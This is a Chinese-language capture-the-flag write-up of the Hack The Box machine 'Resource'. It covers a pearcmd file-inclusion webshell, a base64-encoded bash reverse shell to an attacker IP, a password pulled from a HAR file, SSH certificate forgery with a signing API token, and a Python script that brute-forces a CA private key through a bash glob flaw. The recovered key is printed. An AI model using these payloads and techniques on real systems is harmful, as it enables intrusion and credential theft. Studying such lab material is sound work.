HacktheBox-Resource

Season 6 Week 1

晚上睡不着觉,打一发。这 tm 是中等?
Clip_2024-08-09_17-25-36.png

信息搜集

fscan 一把嗦

1
2
3
4
5
6
start infoscan
10.10.11.27:80 open
10.10.11.27:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.10.11.27        code:302 len:154    title:302 Found 跳转url: http://itrc.ssg.htb/

扫到三级域名,添加hosts

pearcmd

上来看指纹是个 php,有文件上传,打半天没打动,后面一查 wp 用 pearcmd,因为是 tp。

1
/?page=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=eval($_REQUEST[1]);?>+/var/www/itrc/uploads/shell.php

Clip_2024-08-09_14-36-14.png
然后访问上传地址:uploads/shell.php 测试
Clip_2024-08-09_14-38-22.png
反弹 shell。
Clip_2024-08-09_14-45-34.png
🤔
这种不知道为什么打不了反弹 shell。但是 pearcmd 能打,换个直接传 shell 的时候就设置反弹shell。

1
page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?shell_exec(base64_decode("L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTAuMTAuMTQuMzMvNzc3NyAwPiYxJw=="));?>+/var/www/itrc/uploads/shell.php

Clip_2024-08-09_14-49-17.png
然后解压文件夹下最大的 zip 文件:
Clip_2024-08-09_14-57-39.png
给他下到本地http://itrc.ssg.htb/uploads/c2f4813259cc57fab36b311c5058cf031cb6eb51.zip
查看文件:

1
cat itrc.ssg.htb.har| grep pass

Clip_2024-08-09_15-01-53.png
user=msainristil&pass=82yards2closeit

SSH itrc - msainristil

ssh 能登录。

1
ssh msainristil@10.10.11.27

然后又懵逼了,看了 wp。
能注意到根目录下有.dockerenv文件夹,
Clip_2024-08-09_15-04-47.png
说明我们现在在 docker 内部,然后需要逃逸出去。
查看所有用户,发现还有一个zzinter
Clip_2024-08-09_15-11-12.png
进到~/decommission_old_ca 文件夹下。

1
ssh-keygen -t rsa -b 2048 -f natro92

生成密钥对,指定算法和密钥长度。
Clip_2024-08-09_15-17-33.png

1
ssh-keygen -s ca-itrc -I uuu -V +1w -n zzinter -z 1 natro92.pub

-s ca-itrc:指定使用名为 ca-itrc 的签名密钥来进行操作。
-I uuu:为生成的签名设置标识符为 uuu 。
-V +1w:设置签名的有效期为 1 周(1 week)。
-n zzinter:指定签名的主体名称为 zzinter 。
Clip_2024-08-09_15-25-58.png

1
ssh -o CertificateFile=natro92-cert.pub -i natro92 zzinter@localhost

-o CertificateFile=natro92-cert.pub:指定使用名为 natro92-cert.pub 的证书文件进行身份验证或其他与证书相关的操作。
-i natro92:指定使用名为 natro92 的私钥文件用于身份验证。

itrc - zzinter

Clip_2024-08-09_15-28-54.png
Clip_2024-08-09_15-31-16.png
这个是 user 权限。有 userflag。但是现在还是在 docker 中。

1
cat /etc/ssh/ca_users_keys.pub

用户目录下有一个sign_key_api.sh:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/bin/bash

usage () {
    echo "Usage: $0 <public_key_file> <username> <principal>"
    exit 1
}

if [ "$#" -ne 3 ]; then
    usage
fi

public_key_file="$1"
username="$2"
principal_str="$3"

supported_principals="webserver,analytics,support,security"
IFS=',' read -ra principal <<< "$principal_str"
for word in "${principal[@]}"; do
    if ! echo "$supported_principals" | grep -qw "$word"; then
        echo "Error: '$word' is not a supported principal."
        echo "Choose from:"
        echo "    webserver - external web servers - webadmin user"
        echo "    analytics - analytics team databases - analytics user"
        echo "    support - IT support server - support user"
        echo "    security - SOC servers - support user"
        echo
        usage
    fi
done

if [ ! -f "$public_key_file" ]; then
    echo "Error: Public key file '$public_key_file' not found."
    usage
fi

public_key=$(cat $public_key_file)

curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "'"$public_key"'", "username": "'"$username"'", "principals": "'"$principal"'"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE"

主要是从 16 行到 29 行。定义了一个包含支持的主体(supported_principals)的字符串。将输入的 principal_str 按逗号分割为数组 principal 。然后遍历这个数组,如果其中的元素不在支持的主体列表中,就打印错误信息,给出支持的主体选项,并调用 usage 函数。
检查公钥文件是否存在。最后用 curl 发送一个 post 请求。
按照它的要求输入参数。

1
2
ssh-keygen -t rsa -b 2048 -f natro93
bash ./sign_key_api.sh natro93.pub natro92 support
1
ssh-rsa-cert-v01@openssh.com AAAAHHNzaC1yc2EtY2VydC12MDFAb3BlbnNzaC5jb20AAAAgk1qje5oXOK3N1niFmX5LcP2K5AQjM1UJGRjgGlcOGqAAAAADAQABAAABAQC7LLvZISmjlIpCx8hQSwxbW5jaWzwLB1Qnu7EmLPl9vu7F0gwfGZLT1/YuTN129f1+xfSqRMWSzsK3khEzXiSC4wbD4X5e7pJbDBBqtZMjSP68u4uoe51fb9GB0U72N6eXUOXcUoNImEVY4g5lM4600ky47CcC9z9ZTLtXi5WA0fNUlcAEwFEM1dMiBErHsTfVQk1fLxVkuB+DF8+hJCbV0T6STeHQlB19hDWIeyPK56a0l5rW5yOaFroU4SQDaTmbKqdBT/wskzyIypiPTTJKxu3i3lD7xmL7i358gYhHYMluDVVpKlscAVCkOuogS6B/MGSme1E/WV6QsSlO8QlnAAAAAAAAACgAAAABAAAAB25hdHJvOTIAAAALAAAAB3N1cHBvcnQAAAAAZqyTxP//////////AAAAAAAAAIIAAAAVcGVybWl0LVgxMS1mb3J3YXJkaW5nAAAAAAAAABdwZXJtaXQtYWdlbnQtZm9yd2FyZGluZwAAAAAAAAAWcGVybWl0LXBvcnQtZm9yd2FyZGluZwAAAAAAAAAKcGVybWl0LXB0eQAAAAAAAAAOcGVybWl0LXVzZXItcmMAAAAAAAAAAAAAADMAAAALc3NoLWVkMjU1MTkAAAAggeDwK53LVKHJh+rMLcA2WABxbtDgyhm57MATyY0VKbEAAABTAAAAC3NzaC1lZDI1NTE5AAAAQA9H4WvMX2Fw0Gnxo46MwUKmPYrHMOiOCzjOAbccPvPdpfyRuvQl1mYP3P7vx/v6KS22yfKBlMVcWYy7NwAYlwQ= zzinter@itrc

然后将其写入文件,并给予 600 权限。

1
2
3
vim natro
chmod 600 natro
chmod 600 natro93

然后连接

1
ssh -i natro93 -p 2222 -o CertificateFile=natro support@172.223.0.1

ssg - support

Clip_2024-08-09_15-45-17.png
home 文件夹下是 support 和 zzinter。

1
2
ls /etc/ssh/auth_principals
root  support  zzinter
1
2
3
4
5
6
7
support@ssg:/etc/ssh/auth_principals$ cat root
root_user
support@ssg:/etc/ssh/auth_principals$ cat support
support
root_user
support@ssg:/etc/ssh/auth_principals$ cat zzinter
zzinter_temp

opt 文件夹下的sign_key.sh所属组是 zzinter
Clip_2024-08-09_15-48-16.png
然后再开一个 ssh 重新到 zzinter 处。将 natro93.pub 的内容提取进 curl 命令中。

1
curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2vbyOgAno0/wUAP6PSrfnSaQbQA4l9iwCzyczChIVnqE3tq27U9/RomzVkjZhMKmoQDgfdPkh42eiF5OLgdAHllGWYMsY+vprcoOp9h6GFJG+5raQELEWglv53JHPafeTeq0k99D2jX5P3DzNT4jVAYjdezPduGTtaelzEjzXgcoxxeguT76f+Egiaqlgc7ezBjFlLe6adhVKdOLujjsYd4LopHy20K/MSPqRN12zWqvtg+wmgSD2liDTEoGDpnqIzYTmSheQjqScHKV83MuIbR01XGKlIIKfz5B8W5ktO5fS70KlOEV9idNOdLJTGDoSLFWhm08/BAR6GsjCFaR7 zzinter@itrc", "username": "zzinter", "principals": "zzinter_temp"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE"

将返回结果保存进natro93-cert

1
ssh-rsa-cert-v01@openssh.com AAAAHHNzaC1yc2EtY2VydC12MDFAb3BlbnNzaC5jb20AAAAghz3leEbghiKRMEKYVN6L3RKuiTJV1cfLF4XK1Fd3RSYAAAADAQABAAABAQC2vbyOgAno0/wUAP6PSrfnSaQbQA4l9iwCzyczChIVnqE3tq27U9/RomzVkjZhMKmoQDgfdPkh42eiF5OLgdAHllGWYMsY+vprcoOp9h6GFJG+5raQELEWglv53JHPafeTeq0k99D2jX5P3DzNT4jVAYjdezPduGTtaelzEjzXgcoxxeguT76f+Egiaqlgc7ezBjFlLe6adhVKdOLujjsYd4LopHy20K/MSPqRN12zWqvtg+wmgSD2liDTEoGDpnqIzYTmSheQjqScHKV83MuIbR01XGKlIIKfz5B8W5ktO5fS70KlOEV9idNOdLJTGDoSLFWhm08/BAR6GsjCFaR7AAAAAAAAACoAAAABAAAAB3p6aW50ZXIAAAAQAAAADHp6aW50ZXJfdGVtcAAAAABmrI9x//////////8AAAAAAAAAggAAABVwZXJtaXQtWDExLWZvcndhcmRpbmcAAAAAAAAAF3Blcm1pdC1hZ2VudC1mb3J3YXJkaW5nAAAAAAAAABZwZXJtaXQtcG9ydC1mb3J3YXJkaW5nAAAAAAAAAApwZXJtaXQtcHR5AAAAAAAAAA5wZXJtaXQtdXNlci1yYwAAAAAAAAAAAAAAMwAAAAtzc2gtZWQyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQAAAFMAAAALc3NoLWVkMjU1MTkAAABALXtAVOEZ4ai9TuxOFPHEzEtGC8MidfqmrP/hirq7Ajg2jZ4HtNVTIBfQut8Gie7Z3eku6PofgEEfrXcFWd9/CQ== zzinter@itrc

然后连接

1
ssh -p 2222 -i natro93 -o CertificateFile=natro93-cert zzinter@172.223.0.1

ssg - zzinter

然后就登录到 ssg 这里了。用 zzinter 的账号去查看刚才没有权限的sign_key.sh脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#!/bin/bash

usage () {
    echo "Usage: $0 <ca_file> <public_key_file> <username> <principal> <serial>"
    exit 1
}

if [ "$#" -ne 5 ]; then
    usage
fi

ca_file="$1"
public_key_file="$2"
username="$3"
principal="$4"
serial="$5"

if [ ! -f "$ca_file" ]; then
    echo "Error: CA file '$ca_file' not found."
    usage
fi

if [[ $ca == "/etc/ssh/ca-it" ]]; then
    echo "Error: Use API for signing with this CA."
    usage
fi

itca=$(cat /etc/ssh/ca-it)
ca=$(cat "$ca_file")
if [[ $itca == $ca ]]; then
    echo "Error: Use API for signing with this CA."
    usage
fi

if [ ! -f "$public_key_file" ]; then
    echo "Error: Public key file '$public_key_file' not found."
    usage
fi

supported_principals="webserver,analytics,support,security"
IFS=',' read -ra principal <<< "$principal_str"
for word in "${principal[@]}"; do
    if ! echo "$supported_principals" | grep -qw "$word"; then
        echo "Error: '$word' is not a supported principal."
        echo "Choose from:"
        echo "    webserver - external web servers - webadmin user"
        echo "    analytics - analytics team databases - analytics user"
        echo "    support - IT support server - support user"
        echo "    security - SOC servers - support user"
        echo
        usage
    fi
done

if ! [[ $serial =~ ^[0-9]+$ ]]; then
    echo "Error: '$serial' is not a number."
    usage
fi

ssh-keygen -s "$ca_file" -z "$serial" -I "$username" -V -1w:forever -n "$principals" "$public_key_name"

这里使用 Poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import string
import subprocess
s = string.ascii_letters+'+'+ '-' + '\n' + ' '+ '/' + '=' + string.digits
strlist = '-'

while True:
     for i in s:
        listres = i + strlist
        listtemp = '*' + listres
        with open('testca', 'w') as f:
            f.write(listtemp)
        a=subprocess.run(f'sudo /opt/sign_key.sh ./testca test.pub root root_user 1', shell=True, stdout=subprocess.PIPE, text=True)
        if 'Use API for signing with this CA' in a.stdout:
            strlist = listres
            print(strlist)
            break

然后就等他一点点爆破吧:(注意看着点网页,别让靶机重启了😡,跑了两遍)
Clip_2024-08-09_16-21-39.png
Clip_2024-08-09_16-35-09.png

1
2
3
4
5
6
7
8
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQAAAKg7BlysOwZc
rAAAAAtzc2gtZWQyNTUxOQAAACCB4PArnctUocmH6swtwDZYAHFu0ODKGbnswBPJjRUpsQ
AAAEBexnpzDJyYdz+91UG3dVfjT/scyWdzgaXlgx75RjYOo4Hg8Cudy1ShyYfqzC3ANlgA
cW7Q4MoZuezAE8mNFSmxAAAAIkdsb2JhbCBTU0cgU1NIIENlcnRmaWNpYXRlIGZyb20gSV
QBAgM=
-----END OPENSSH PRIVATE KEY-----

写道 testca 这个文件里面,然后设定 600 权限(这个很重要,不然会没法生成 cert。)

1
2
3
ssh-keygen -t rsa -b 2048 -f natro1
ssh-keygen -s testca -I root -V -10w:forever -n root_user -z l natro1.pub
ssh root@172.223.0.1 -p 2222 -i natro

Clip_2024-08-09_17-11-29.png

后记

妈的,不会做,这是中等难度?更睡不着了😡